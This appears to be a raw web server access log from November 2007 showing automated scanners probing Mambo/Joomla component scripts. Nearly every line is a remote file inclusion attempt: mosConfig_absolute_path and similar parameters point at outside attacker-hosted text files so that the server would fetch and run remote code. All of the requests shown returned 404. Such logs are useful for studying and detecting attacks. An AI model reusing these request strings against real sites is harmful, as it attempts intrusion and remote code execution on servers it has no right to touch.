68.8.70.183 - - [04/Nov/2007:16:03:12 -0800] "GET /logs/access_070730.log/administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.129.152.113 - - [04/Nov/2007:16:03:13 -0800] "GET /logs/access_071008.log/administrator/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.129.152.113 - - [04/Nov/2007:16:03:18 -0800] "GET /administrator/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.129.152.113 - - [04/Nov/2007:16:03:21 -0800] "GET /logs/administrator/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
88.45.219.178 - - [04/Nov/2007:16:03:22 -0800] "GET /logs/administrator/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:03:23 -0800] "GET /administrator/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.12.31.102 - - [04/Nov/2007:16:03:24 -0800] "GET /logs/access_070813.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.12.31.102 - - [04/Nov/2007:16:03:24 -0800] "GET //administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.12.31.102 - - [04/Nov/2007:16:03:24 -0800] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.112.98.168 - - [04/Nov/2007:16:03:29 -0800] "GET /logs/access_070903.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.246.4.133 - - [04/Nov/2007:16:03:30 -0800] "GET /logs/access_070903.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.78.56.125 - - [04/Nov/2007:16:03:39 -0800] "GET /logs/access.log/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:04:08 -0800] "GET /logs/access_070827.log//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:04:08 -0800] "GET //administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:04:08 -0800] "GET /logs//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:04:09 -0800] "GET /logs/access_071022.log//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:04:14 -0800] "GET /logs/access_070917.log/administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:04:15 -0800] "GET /administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:04:16 -0800] "GET /logs/administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:04:17 -0800] "GET /logs/access_070730.log/administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
75.0.141.110 - - [04/Nov/2007:16:04:45 -0800] "GET /logs/access_070826.log/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:04:45 -0800] "GET /administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63"
75.0.141.110 - - [04/Nov/2007:16:04:46 -0800] "GET /logs/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
61.78.56.125 - - [04/Nov/2007:16:05:22 -0800] "GET /logs/access_070903.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.189.224.2 - - [04/Nov/2007:16:05:42 -0800] "GET /logs/access_071001.log/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.189.224.2 - - [04/Nov/2007:16:05:43 -0800] "GET /administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.152.1.228 - - [04/Nov/2007:16:05:44 -0800] "GET /logs/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
75.0.141.110 - - [04/Nov/2007:16:05:45 -0800] "GET /logs/access_070917.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:05:46 -0800] "GET /administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:05:46 -0800] "GET /logs/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:05:50 -0800] "GET /logs/access_070827.log//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:05:51 -0800] "GET //administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:05:53 -0800] "GET /logs//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:05:54 -0800] "GET /logs/access_071022.log//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
61.78.56.125 - - [04/Nov/2007:16:05:55 -0800] "GET /logs/access_070826.log/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.78.56.125 - - [04/Nov/2007:16:05:56 -0800] "GET /administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.78.56.125 - - [04/Nov/2007:16:05:56 -0800] "GET /logs/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
59.125.203.211 - - [04/Nov/2007:16:05:59 -0800] "GET /_theme/breadcrumb.php?rootBase=http://www.ownsyou.kit.net/vvvvv/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.157.122.154 - - [04/Nov/2007:16:06:01 -0800] "GET /logs/access_070827.log//administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
68.157.122.154 - - [04/Nov/2007:16:06:02 -0800] "GET //administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
68.157.122.154 - - [04/Nov/2007:16:06:02 -0800] "GET /logs//administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
85.13.65.33 - - [04/Nov/2007:16:06:05 -0800] "GET /logs/access_070826.log/administrator/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.13.65.33 - - [04/Nov/2007:16:06:11 -0800] "GET /administrator/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.13.65.33 - - [04/Nov/2007:16:06:13 -0800] "GET /logs/administrator/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.204.17.137 - - [04/Nov/2007:16:06:15 -0800] "GET /logs//administrator/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.204.17.137 - - [04/Nov/2007:16:06:17 -0800] "GET //administrator/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
66.7.203.209 - - [04/Nov/2007:16:06:18 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.203.209 - - [04/Nov/2007:16:06:18 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:06:18 -0800] "GET /logs//administrator/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.8.70.183 - - [04/Nov/2007:16:06:18 -0800] "GET /logs/access_071008.log/@rfihttp://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
88.45.219.178 - - [04/Nov/2007:16:06:19 -0800] "GET //administrator/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
68.8.70.183 - - [04/Nov/2007:16:06:23 -0800] "GET /@rfihttp://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
68.8.70.183 - - [04/Nov/2007:16:06:24 -0800] "GET /logs/@rfihttp://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.204.17.137 - - [04/Nov/2007:16:06:55 -0800] "GET /logs/access_070917.log/administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.204.17.137 - - [04/Nov/2007:16:06:56 -0800] "GET /administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.204.17.137 - - [04/Nov/2007:16:06:57 -0800] "GET /logs/administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
88.45.219.178 - - [04/Nov/2007:16:06:57 -0800] "GET /logs/access_070826.log/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
88.45.219.178 - - [04/Nov/2007:16:06:58 -0800] "GET /administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.8.70.183 - - [04/Nov/2007:16:06:58 -0800] "GET /logs/access_070903.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.8.70.183 - - [04/Nov/2007:16:06:59 -0800] "GET /administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.8.70.183 - - [04/Nov/2007:16:06:59 -0800] "GET /logs/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
87.204.17.137 - - [04/Nov/2007:16:06:59 -0800] "GET /logs/access_070730.log/administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
88.45.219.178 - - [04/Nov/2007:16:06:59 -0800] "GET /logs/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:07:07 -0800] "GET /logs/access_071001.log/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:07:07 -0800] "GET /administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
88.45.219.178 - - [04/Nov/2007:16:07:09 -0800] "GET /logs/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:07:16 -0800] "GET /logs/access_070903.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
59.152.1.228 - - [04/Nov/2007:16:07:16 -0800] "GET /logs//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.152.1.228 - - [04/Nov/2007:16:07:17 -0800] "GET //administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.204.17.137 - - [04/Nov/2007:16:07:17 -0800] "GET /logs/access_070827.log//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.204.17.137 - - [04/Nov/2007:16:07:18 -0800] "GET //administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.204.17.137 - - [04/Nov/2007:16:07:19 -0800] "GET /logs//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.204.17.137 - - [04/Nov/2007:16:07:20 -0800] "GET /logs/access_071022.log//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.214.44.193 - - [04/Nov/2007:16:07:26 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.zperonowki.com/html/modules/PNphpBB2/includes/r8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.189.224.2 - - [04/Nov/2007:16:07:30 -0800] "GET /logs/access_070917.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.189.224.2 - - [04/Nov/2007:16:07:31 -0800] "GET /administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.189.224.2 - - [04/Nov/2007:16:07:32 -0800] "GET /logs/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805"
87.204.17.137 - - [04/Nov/2007:16:07:45 -0800] "GET /logs/access_070826.log/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.204.17.137 - - [04/Nov/2007:16:07:46 -0800] "GET /administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.204.17.137 - - [04/Nov/2007:16:07:47 -0800] "GET /logs/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
59.152.1.228 - - [04/Nov/2007:16:08:07 -0800] "GET /logs/access_070827.log//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
59.152.1.228 - - [04/Nov/2007:16:08:07 -0800] "GET //administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.152.1.228 - - [04/Nov/2007:16:08:08 -0800] "GET /logs//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.189.224.2 - - [04/Nov/2007:16:08:09 -0800] "GET /logs/access_071022.log//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [04/Nov/2007:16:08:26 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.lasexta.net/components/rm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
213.246.39.80 - - [04/Nov/2007:16:08:27 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.lasexta.net/components/rm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.189.224.2 - - [04/Nov/2007:16:08:36 -0800] "GET /logs/access_071022.log/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:08:43 -0800] "GET /logs/access_070917.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:08:44 -0800] "GET /administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:08:46 -0800] "GET /logs/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
87.204.17.137 - - [04/Nov/2007:16:08:51 -0800] "GET /logs/access_071001.log/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.204.17.137 - - [04/Nov/2007:16:08:52 -0800] "GET /administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.204.17.137 - - [04/Nov/2007:16:08:53 -0800] "GET /logs/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
59.152.1.228 - - [04/Nov/2007:16:08:59 -0800] "GET /logs/access_070826.log/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
59.152.1.228 - - [04/Nov/2007:16:08:59 -0800] "GET /administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.152.1.228 - - [04/Nov/2007:16:09:00 -0800] "GET /logs/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.189.224.2 - - [04/Nov/2007:16:09:02 -0800] "GET /logs/access_070903.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.7.203.209 - - [04/Nov/2007:16:09:22 -0800] "GET /logs/access_070716.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
68.8.70.183 - - [04/Nov/2007:16:09:32 -0800] "GET /logs/access_071001.log/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
68.8.70.183 - - [04/Nov/2007:16:09:32 -0800] "GET /administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.8.70.183 - - [04/Nov/2007:16:09:32 -0800] "GET /logs/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:09:41 -0800] "GET /logs/access_071022.log/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.112.166.87 - - [04/Nov/2007:16:09:43 -0800] "GET /logs/access_070827.log//administrator/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
84.112.166.87 - - [04/Nov/2007:16:09:48 -0800] "GET /logs//administrator/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
